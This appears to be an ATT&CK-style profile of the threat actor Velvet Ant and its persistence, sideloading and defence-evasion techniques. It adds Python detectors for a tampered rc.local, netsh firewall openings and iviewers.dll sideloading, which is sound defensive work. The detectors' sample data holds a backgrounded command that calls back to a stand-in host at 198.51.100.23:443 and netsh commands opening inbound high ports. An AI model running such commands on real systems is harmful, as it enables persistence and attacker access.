Velvet Ant

Velvet Ant is a threat actor operating since at least 2021. Velvet Ant is associated with complex persistence mechanisms, the targeting of network devices and appliances during operations, and the use of zero-day exploits.(Citation: Sygnia VelvetAnt 2024A)(Citation: Sygnia VelvetAnt 2024B)
ID: G1047
Associated Groups: none listed
Created: 14 Mar 2025
Last Modified: 04 Apr 2025

Techniques Used

Domain ID Name Use
Enterprise T1037 .004 Boot or Logon Initialization Scripts: RC Scripts

Velvet Ant used a modified `/etc/rc.local` file on compromised F5 BIG-IP devices to maintain persistence.(Citation: Sygnia VelvetAnt 2024A)
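
A modified `rc.local` is only useful to a defender if it is compared against something. The check below is an added example written for this page, not code from the Sygnia reports or from MITRE: it records a SHA-256 of the file for comparison with a digest taken at deployment, and it flags command lines that are not in an assumed per-device baseline, reference temporary or hidden paths, or are backgrounded. The sample `rc.local` content, the baseline program list and the suspicious-path list are all constructed assumptions, not F5 defaults.

```python
import hashlib
import shlex

# Constructed sample of a tampered /etc/rc.local (not a real F5 artifact).
# The first commands are the sort of content a baseline would cover; the
# nohup line launches a binary from a temp directory at every boot.
SAMPLE_RC_LOCAL = """#!/bin/sh
# rc.local - executed at the end of multi-user boot
touch /var/lock/subsys/local
/usr/local/bin/vendor-agent --start
nohup /var/tmp/.cache/updater -c 198.51.100.23:443 >/dev/null 2>&1 &
exit 0
"""

# Assumed per-device-class baseline: programs an administrator has approved
# to run from rc.local, keyed by the first token of each command.
BASELINE_PROGRAMS = frozenset({"touch", "/usr/local/bin/vendor-agent", "exit"})

# Nothing legitimate should start at boot from these locations (assumption).
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")
WRAPPERS = {"nohup", "exec", "setsid"}


def file_digest(content):
    """SHA-256 of the file text; compare with a digest recorded at deployment."""
    return hashlib.sha256(content.encode()).hexdigest()


def rc_local_findings(content, baseline_programs=BASELINE_PROGRAMS):
    """Return (line_no, line, reason) for each command line that the baseline
    does not explain or that shows persistence-style traits."""
    findings = []
    for line_no, raw in enumerate(content.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            tokens = shlex.split(line)
        except ValueError:
            findings.append((line_no, line, "unparseable command"))
            continue
        cmd = tokens
        while cmd and cmd[0] in WRAPPERS:  # peel off nohup/exec/setsid
            cmd = cmd[1:]
        if not cmd:
            continue
        reasons = []
        if cmd[0] not in baseline_programs:
            reasons.append("program not in baseline")
        if any(t.startswith(WRITABLE_PREFIXES) for t in cmd):
            reasons.append("references a writable/temporary path")
        if any(seg.startswith(".") for t in cmd for seg in t.split("/")[1:]):
            reasons.append("hidden path component")
        if tokens[-1] == "&":
            reasons.append("backgrounded")
        if reasons:
            findings.append((line_no, line, "; ".join(reasons)))
    return findings


if __name__ == "__main__":
    print("digest:", file_digest(SAMPLE_RC_LOCAL))
    for finding in rc_local_findings(SAMPLE_RC_LOCAL):
        print(finding)
```

The digest comparison catches any edit at all; the per-line heuristics tell an analyst which line to look at first. On appliances where `/etc/rc.local` is vendor-managed, the stored digest should be refreshed as part of the upgrade procedure so that a legitimate change does not mask a later malicious one.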

Enterprise T1059 .004 Command and Scripting Interpreter: Unix Shell

Velvet Ant used a custom tool, VELVETSTING, to parse encoded inbound commands to compromised F5 BIG-IP devices and then execute them via the Unix shell.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

Velvet Ant has used a reverse SSH shell to securely communicate with victim devices.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1574 .001 Hijack Execution Flow: DLL

Velvet Ant has used malicious DLLs executed via legitimate EXE files through DLL search order hijacking to launch follow-on payloads such as PlugX.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

Velvet Ant attempted to disable local security tools and endpoint detection and response (EDR) software during operations.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1562 .004 Impair Defenses: Disable or Modify System Firewall

Velvet Ant modified system firewall settings during PlugX installation using `netsh.exe` to open a random high-numbered listening port on victim devices.(Citation: Sygnia VelvetAnt 2024A)
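
Because `netsh.exe` is a signed Windows binary, the detection opportunity is in the command line rather than the image. The following is an added example, not code from the Sygnia reports or MITRE: it parses process-creation records for both the modern `netsh advfirewall firewall add rule` syntax and the legacy `netsh firewall add portopening` syntax, and flags inbound allow rules on ports at or above an assumed threshold. The event records and the 10000 cutoff are constructed assumptions.

```python
import re

# Constructed process-creation records (time, user, image, command line) in the
# shape an EDR or Sysmon Event ID 1 feed would provide. Sample data only.
SAMPLE_EVENTS = [
    ("2024-05-02T10:14:03Z", "WS01\\svc_backup", "C:\\Windows\\System32\\netsh.exe",
     'netsh advfirewall firewall add rule name="Windows Update Helper" dir=in action=allow protocol=TCP localport=49731'),
    ("2024-05-02T10:14:09Z", "WS01\\svc_backup", "C:\\Windows\\System32\\netsh.exe",
     "netsh firewall add portopening TCP 52111 helper"),
    ("2024-05-02T11:00:00Z", "WS01\\admin", "C:\\Windows\\System32\\netsh.exe",
     'netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389'),
    ("2024-05-02T11:05:00Z", "WS01\\admin", "C:\\Windows\\System32\\netsh.exe",
     "netsh interface ip show config"),
]

HIGH_PORT_MIN = 10000  # assumed threshold for "random high-numbered" ports

ADV_RE = re.compile(r"advfirewall\s+firewall\s+add\s+rule\b(?P<args>.*)", re.I)
LEGACY_RE = re.compile(
    r"\bfirewall\s+add\s+portopening\s+(?:protocol=)?(?P<proto>tcp|udp)\s+(?:port=)?(?P<port>\d+)",
    re.I)
KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')  # key=value, value may be quoted


def parse_netsh_rule(cmdline):
    """Return {'port', 'proto', 'name', 'syntax'} when cmdline adds an inbound allow
    rule via netsh (advfirewall or legacy portopening syntax), else None."""
    m = ADV_RE.search(cmdline)
    if m:
        kv = {k.lower(): v.strip('"') for k, v in KV_RE.findall(m.group("args"))}
        if kv.get("dir", "").lower() != "in" or kv.get("action", "").lower() != "allow":
            return None
        port = kv.get("localport", "")
        if not port.isdigit():
            return None  # ranges ("49000-49999") and "any" need their own handling
        return {"port": int(port), "proto": kv.get("protocol", "").upper(),
                "name": kv.get("name", ""), "syntax": "advfirewall"}
    m = LEGACY_RE.search(cmdline)
    if m:
        return {"port": int(m.group("port")), "proto": m.group("proto").upper(),
                "name": "", "syntax": "legacy"}
    return None


def suspicious_port_openings(events, high_port_min=HIGH_PORT_MIN):
    """Flag netsh invocations that open an inbound high-numbered port."""
    findings = []
    for ts, user, image, cmdline in events:
        if not image.lower().endswith("\\netsh.exe"):
            continue
        rule = parse_netsh_rule(cmdline)
        if rule and rule["port"] >= high_port_min:
            findings.append({"time": ts, "user": user, **rule})
    return findings


if __name__ == "__main__":
    for finding in suspicious_port_openings(SAMPLE_EVENTS):
        print(finding)
```

A rule added with an innocuous name such as "Windows Update Helper" is exactly why the logic keys on `dir=in`, `action=allow` and the port rather than on the rule name; correlating the hit with a service installation (Event ID 7045) in the same time window by the same account would tie it to the PlugX installation the text describes.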

Enterprise T1036 .005 Masquerading: Match Legitimate Resource Name or Location

Velvet Ant used a malicious DLL, `iviewers.dll`, that mimics the legitimate "OLE/COM Object Viewer" within Windows.(Citation: Sygnia VelvetAnt 2024A)
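
The two entries above (search-order hijacking via a legitimate EXE, and the `iviewers.dll` name borrowed from the OLE/COM Object Viewer) describe one sideloading pattern: a trusted host executable copied somewhere it does not belong, with an attacker DLL beside it under the name the host expects to load. The hunt below is an added example, not code from the Sygnia reports or MITRE: it walks a directory tree, and wherever a watchlisted host EXE sits next to its expected DLL name, it reports the DLL unless its hash is in a known-good set. The watchlist contains only the `oleview.exe`/`iviewers.dll` pair this page names; the directory layout and file contents in `demo()` are constructed. In production the known-good set would come from an Authenticode or software-inventory check, which this offline example does not perform.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# Assumed watchlist: host EXE -> DLL names it resolves from its own directory.
# Only the pair named on this page is listed; extend from your own telemetry.
SIDELOAD_PAIRS = {
    "oleview.exe": {"iviewers.dll"},
}


def sha256_file(path):
    """Streaming SHA-256 of a file."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def find_sideload_candidates(root, known_good=frozenset(), pairs=SIDELOAD_PAIRS):
    """Walk root; for each directory holding a watchlisted EXE, report co-located
    DLLs from the pair list whose SHA-256 is not in known_good."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        lower = {f.lower(): f for f in files}  # case-insensitive, as NTFS is
        for exe, dlls in pairs.items():
            if exe not in lower:
                continue
            for dll in dlls:
                if dll not in lower:
                    continue
                dll_path = Path(dirpath) / lower[dll]
                digest = sha256_file(dll_path)
                if digest in known_good:
                    continue
                findings.append({
                    "exe": str(Path(dirpath) / lower[exe]),
                    "dll": str(dll_path),
                    "sha256": digest,
                })
    return findings


def demo():
    """Constructed tree: a vendor copy of oleview.exe with its genuine DLL, and a
    second copy dropped under ProgramData with a different iviewers.dll."""
    with tempfile.TemporaryDirectory() as tmp:
        sdk = Path(tmp) / "sdk"
        sdk.mkdir()
        (sdk / "oleview.exe").write_bytes(b"MZ constructed host binary")
        (sdk / "iviewers.dll").write_bytes(b"MZ constructed vendor dll")
        dropped = Path(tmp) / "ProgramData" / "Helper"
        dropped.mkdir(parents=True)
        (dropped / "oleview.exe").write_bytes(b"MZ constructed host binary")
        (dropped / "IVIEWERS.DLL").write_bytes(b"MZ constructed unexpected dll")
        known_good = {sha256_file(sdk / "iviewers.dll")}
        return find_sideload_candidates(tmp, known_good)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The host EXE itself is genuine and will pass signature checks, so the thing to key on is the DLL's hash (or signer) and the unusual location of the pair; a copy of a developer tool under `ProgramData`, a user profile or a temp directory deserves a look even when the DLL hash is unknown rather than known-bad.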

Enterprise T1090 .001 Proxy: Internal Proxy

Velvet Ant has tunneled traffic from victims through an internal, compromised host to proxy communications to command and control nodes.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1021 .002 Remote Services: SMB/Windows Admin Shares

Velvet Ant has transferred tools within victim environments using SMB.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1569 .002 System Services: Service Execution

Velvet Ant executed and installed PlugX as a Windows service.(Citation: Sygnia VelvetAnt 2024A)

Enterprise T1078 .003 Valid Accounts: Local Accounts

Velvet Ant accessed vulnerable Cisco switch devices using accounts with administrator privileges.(Citation: Sygnia VelvetAnt 2024B)
